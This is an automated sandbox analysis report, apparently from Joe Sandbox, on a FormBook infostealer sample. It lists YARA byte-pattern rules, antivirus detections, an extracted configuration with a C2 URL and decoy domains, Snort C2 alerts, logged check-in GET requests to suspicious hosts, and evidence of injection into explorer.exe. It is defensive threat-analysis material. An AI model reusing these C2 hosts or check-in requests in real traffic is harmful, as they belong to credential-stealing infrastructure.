1.0.TT COPY_02101011.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.TT COPY_02101011.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
1.0.TT COPY_02101011.exe.400000.3.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.TT COPY_02101011.exe.400000.3.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.TT COPY_02101011.exe.400000.3.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
1.2.TT COPY_02101011.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.TT COPY_02101011.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.TT COPY_02101011.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
1.0.TT COPY_02101011.exe.400000.3.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.TT COPY_02101011.exe.400000.3.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.TT COPY_02101011.exe.400000.3.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
1.1.TT COPY_02101011.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.1.TT COPY_02101011.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.1.TT COPY_02101011.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ae9:$sqlite3step: 68 34 1C 7B E1 0x16bfc:$sqlite3step: 68 34 1C 7B E1 0x16b18:$sqlite3text: 68 38 2A 90 C5 0x16c3d:$sqlite3text: 68 38 2A 90 C5 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
1.0.TT COPY_02101011.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.0.TT COPY_02101011.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.0.TT COPY_02101011.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15ce9:$sqlite3step: 68 34 1C 7B E1 0x15dfc:$sqlite3step: 68 34 1C 7B E1 0x15d18:$sqlite3text: 68 38 2A 90 C5 0x15e3d:$sqlite3text: 68 38 2A 90 C5 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.helpfromjames.com/e8ia/"], "decoy": ["le-hameau-enchanteur.com", "quantumsystem-au.club", "engravedeeply.com", "yesrecompensas.lat", "cavallitowerofficials.com", "800seaspray.com", "skifun-jetski.com", "thouartafoot.com", "nft2dollar.com", "petrestore.online", "cjcutthecord2.com", "tippimccullough.com", "gadget198.xyz", "djmiriam.com", "bitbasepay.com", "cukierniawz.com", "mcclureic.xyz", "inthekitchenshakinandbakin.com", "busy-clicks.com", "melaniemorris.online", "elysiangp.com", "7bkj.com", "wakeanddraw.com", "ascalar.com", "iteraxon.com", "henleygirlscricket.com", "torresflooringdecorllc.com", "helgquieta.quest", "xesteem.com", "graffity-aws.com", "bolerparts.com", "andriylysenko.com", "bestinvest-4-you.com", "frelsicycling.com", "airductcleaningindianapolis.net", "nlproperties.net", "alkoora.xyz", "sakiyaman.com", "wwwsmyrnaschooldistrict.com", "unitedsafetyassociation.com", "fiveallianceapparel.com", "edgelordkids.com", "herhauling.com", "intelldat.com", "weprepareamerica-planet.com", "webartsolution.net", "yiquge.com", "marraasociados.com", "dentalimplantnearyou-ca.space", "linemanbible.com", "dunamisdispatchservicellc.com", "latamoperationalinstitute.com", "stpaulsschoolbagidora.com", "groupninemed.com", "solar-tribe.com", "footairdz.com", "blttsperma.quest", "xfeuio.xyz", "sahodyafbdchapter.com", "0934800.com", "dandftrading.com", "gladway.net", "mineriasinmercurio.com", "inaampm.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: TT COPY_02101011.exe	Virustotal: Detection: 36%			Perma Link
Source: TT COPY_02101011.exe	ReversingLabs: Detection: 15%

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll

ReversingLabs: Detection: 15%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll

Joe Sandbox ML: detected

Source: 1.0.TT COPY_02101011.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.TT COPY_02101011.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.TT COPY_02101011.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.NETSTAT.EXE.372796c.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.NETSTAT.EXE.d6e840.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: TT COPY_02101011.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405250
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00405C22 FindFirstFileA,FindClose,	0_2_00405C22
Source: C:\Users\user\Desktop\TT COPY_02101011.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 37.123.118.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.186.33.5 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.webartsolution.net
Source: C:\Windows\explorer.exe	Network Connect: 185.65.236.168 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.mcclureic.xyz
Source: C:\Windows\explorer.exe	Domain query: www.gadget198.xyz
Source: C:\Windows\explorer.exe	Domain query: www.intelldat.com
Source: C:\Windows\explorer.exe	Network Connect: 3.96.23.237 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.helpfromjames.com
Source: C:\Windows\explorer.exe	Network Connect: 172.67.158.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.le-hameau-enchanteur.com
Source: C:\Windows\explorer.exe	Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe	Network Connect: 198.54.125.56 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.139.128.11 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.yesrecompensas.lat
Source: C:\Windows\explorer.exe	Domain query: www.henleygirlscricket.com
Source: C:\Windows\explorer.exe	Network Connect: 143.95.80.65 80	Jump to behavior

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe	DNS query: www.mcclureic.xyz
Source: C:\Windows\explorer.exe	DNS query: www.gadget198.xyz

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.helpfromjames.com/e8ia/

Source: Joe Sandbox View

ASN Name: UK2NET-ASGB UK2NET-ASGB

Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1Host: www.yesrecompensas.latConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1Host: www.gadget198.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1Host: www.le-hameau-enchanteur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1Host: www.henleygirlscricket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1Host: www.webartsolution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1Host: www.intelldat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 37.123.118.150 37.123.118.150

Source: global traffic

HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.10.3 (Ubuntu)Date: Thu, 25 Nov 2021 16:50:07 GMTContent-Type: text/htmlContent-Length: 178Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Source: TT COPY_02101011.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: TT COPY_02101011.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Source: unknown

DNS traffic detected: queries for: www.mcclureic.xyz

Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1Host: www.yesrecompensas.latConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1Host: www.gadget198.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1Host: www.le-hameau-enchanteur.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1Host: www.henleygirlscricket.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1Host: www.webartsolution.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1Host: www.blttsperma.questConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1Host: www.intelldat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\TT COPY_02101011.exe

Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404E07

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
